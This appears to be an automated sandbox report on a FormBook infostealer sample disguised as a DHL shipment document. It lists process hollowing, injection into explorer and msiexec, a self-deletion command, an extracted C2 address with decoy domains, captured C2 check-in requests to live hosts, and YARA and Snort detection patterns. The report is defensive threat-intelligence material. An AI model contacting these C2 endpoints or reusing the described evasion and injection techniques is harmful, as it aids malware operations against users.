Windows Analysis Report
DHL Shipment doc.exe

Overview

General Information

Sample Name: DHL Shipment doc.exe
Analysis ID: 568428
MD5: 4f0d2852d2aad43eddf9416661933701
SHA1: abe4f65cc594a4c217a65486c3025832fe037161
SHA256: 45469e46b7281b1f1c74cbd1953e47121a233462b7ab0db7b8346c5b7b3dfa1c
Tags: DHL, exe, Formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • DHL Shipment doc.exe (PID: 5032 cmdline: "C:\Users\user\Desktop\DHL Shipment doc.exe" MD5: 4F0D2852D2AAD43EDDF9416661933701)
    • DHL Shipment doc.exe (PID: 5820 cmdline: C:\Users\user\Desktop\DHL Shipment doc.exe MD5: 4F0D2852D2AAD43EDDF9416661933701)
    • DHL Shipment doc.exe (PID: 6640 cmdline: C:\Users\user\Desktop\DHL Shipment doc.exe MD5: 4F0D2852D2AAD43EDDF9416661933701)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autoconv.exe (PID: 7096 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • msiexec.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • cmd.exe (PID: 5620 cmdline: /c del "C:\Users\user\Desktop\DHL Shipment doc.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
Source | Rule | Description | Author | Strings
00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      3.0.DHL Shipment doc.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.0.DHL Shipment doc.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.DHL Shipment doc.exe.400000.6.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
        • 0x16b18:$sqlite3text: 68 38 2A 90 C5
        • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
        3.0.DHL Shipment doc.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.0.DHL Shipment doc.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched

          AV Detection

          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
          Source: DHL Shipment doc.exeReversingLabs: Detection: 34%
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: www.floridanratraining.com/how6/Avira URL Cloud: Label: malware
          Source: http://www.auctions.email/how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLddAvira URL Cloud: Label: malware
          Source: DHL Shipment doc.exeJoe Sandbox ML: detected
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL Shipment doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: DHL Shipment doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: StaticArrayInitTypeSize40.pdbxD source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdb source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: StaticArrayInitTypeSize40.pdb source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdb source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 4x nop then pop edi3_2_0040C3AE
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 4x nop then pop edi3_2_00415681
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi11_2_00E9C3AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi11_2_00EA5681

          Networking

          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49825 -> 35.213.137.92:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49825 -> 35.213.137.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49825 -> 35.213.137.92:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49845 -> 37.140.192.43:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49845 -> 37.140.192.43:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49845 -> 37.140.192.43:80
          Source: C:\Windows\explorer.exeDomain query: www.bbgm4egda.xyz
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.auctions.email
          Source: C:\Windows\explorer.exeDomain query: www.klopert77.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.213.137.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.solatopotato.com
          Source: C:\Windows\explorer.exeDNS query: www.bbgm4egda.xyz
          Source: Malware configuration extractorURLs: www.floridanratraining.com/how6/
          Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
          Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.auctions.emailConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd HTTP/1.1Host: www.solatopotato.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.169.145.72 81.169.145.72
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Feb 2022 10:23:34 GMTServer: Apache/2.4.52 (Unix)X-Powered-By: PHP/7.4.27X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://solpotato.com/wp-json/>; rel="https://api.w.org/"Content-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
          Source: unknownDNS traffic detected: queries for: www.bbgm4egda.xyz
          Source: DHL Shipment doc.exe, 00000000.00000002.692578717.0000000001570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL Shipment doc.exe.34817e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.DHL Shipment doc.exe.3431884.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
